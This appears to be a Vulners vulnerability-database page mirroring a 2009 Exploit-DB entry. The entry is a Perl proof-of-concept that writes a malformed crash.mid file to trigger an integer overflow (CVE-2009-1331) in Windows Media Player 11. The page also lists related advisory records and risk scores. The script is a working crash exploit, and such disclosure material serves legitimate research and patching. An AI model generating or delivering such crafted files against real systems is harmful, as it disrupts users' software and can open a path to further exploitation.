Lucene search
+L

Microsoft Windows Media Player - '.mid' Integer Overflow (PoC)

🗓️ 15 Apr 2009 00:00:00Reported by HuoFuType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Windows Media Player '.mid' Integer Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1331
15 Apr 200900:00
circl
cve
CVE
CVE-2009-1331
17 Apr 200914:00
cve
cvelist
Cvelist
CVE-2009-1331
17 Apr 200914:00
cvelist
nvd
NVD
CVE-2009-1331
17 Apr 200914:30
nvd
openvas
OpenVAS
Microsoft Windows Media Player MID File Integer Overflow Vulnerability
23 Apr 200900:00
openvas
openvas
OpenVAS
Microsoft Windows Media Player MID File Integer Overflow Vulnerability
23 Apr 200900:00
openvas
prion
Prion
Integer overflow
17 Apr 200914:30
prion
#!/usr/bin/perl
#
# Windows Media Player (.mid file) Integer Overflow PoC
# By HuoFu
#
# Test Windows Media Player.  Ver: 11.0.5721.5260
#

open(Fin, ">crash.mid") || die "can't create crash sample.$!";

$data = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";

print Fin $data;

close(Fin);

# milw0rm.com [2009-04-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.18057
30